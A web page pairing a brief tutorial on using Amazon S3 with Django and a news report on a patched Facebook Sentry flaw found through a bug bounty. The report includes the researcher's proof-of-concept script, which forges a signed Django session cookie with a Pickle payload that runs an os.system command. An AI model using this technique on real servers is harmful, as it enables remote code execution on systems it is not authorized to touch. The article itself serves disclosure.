How to setup Amazon S3 in a Django Project?

Detailed tutorial with screenshots and code examples 
07 August 2017   1902
Django

High-level, free and open source Python Web framework 

What is Amazon S3? 

Amazon Simple Storage Service (Amazon S3) is an online web service offered by Amazon, providing the ability to store and retrieve any amount of data, anytime from anywhere on the network, a file hosting. With the help of Amazon S3, high scalability, reliability, high speed and inexpensive storage infrastructure are achieved. First appeared in March 2006 in the US and in November 2007 in Europe.

Amazon S3 is used by many other services for storing and hosting files. For example, Dropbox and Ubuntu One, Twitter and Woot.com, and even Minecraft uses it.

How to use Amazon S3 in Django Project? 

The Amazon S3 service can be used to handle static assets and the user uploaded files, that is, the media assets. 

In the tutorial, you will find three sections:

  • Working with static assets only
  • Working with static and media assets
  • Mixing public assets and private assets

Additionally, you will learn how to install Amazon S3

You will also need to install two Python libraries:

  • boto3
  • django-storages

The boto3 library is a public API client to access the Amazon Web Services (AWS) resources, such as the Amazon S3. It’s an official distribution maintained by Amazon.

Python

Multi-paradigm programming language with easy-to-use syntax and many features

The django-storages is an open-source library to manage storage backends like Dropbox, OneDrive and Amazon S3. It’s very convenient, as it plugs in the built-in Django storage backend API. In other words, it will make your life easier, as it won’t drastically change how you interact with the static/media assets. 

Full tutorial is available at SimpleIsBettterThanComplex.

Another Facebook Vulnerability to be Found

Cybersecurity specialist from SCRT find a way to execute code on Facebook server remotely
27 August 2018   598

Daniel Le Gall from SCRT, reported about the vulnerability he found in one of the Facebook servers. The problem is in the Sentry web application for logs storage, written in Python using the Django framework. Facebook experts have already patched a security hole in the server.

Daniel found the problem during the scanning of IP addresses of to the social network. On one of them Sentry service was located with host name sentryagreements.thefacebook.com. When reviewing the application, the specialist noticed a stack trace that appears for an unexpected reason, and problems with the user password reset function. According to him, the Django debugging mode was not disabled, so the trace opened the entire environment of the program:

Facebook Vulnerability
Facebook Vulnerability

SCRT expert discovered among the keys of the environment SESSION_SERIALIZER, which was related to the method django.contrib.sessions.serializers.PickleSerializer. Daniel clarified that using a fake session containing arbitrary content of the binary Pickle protocol for serializing objects in Python, you can run any code in the system. To access the session, he needed a secret Django key, which appeared in the list of Sentry settings in plaintext called system.secret-key:

Facebook Vulnerability
Facebook Vulnerability

The researcher wrote a proof-of-concept script that changed the existing contents of sentrysid cookies to an arbitrary object and made the page load for 30 seconds longer:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent information about the vulnerability to Facebook team and received $ 5000 under the Bug Bounty program. The company specialists cleared the issue in 10 days after receiving the notification.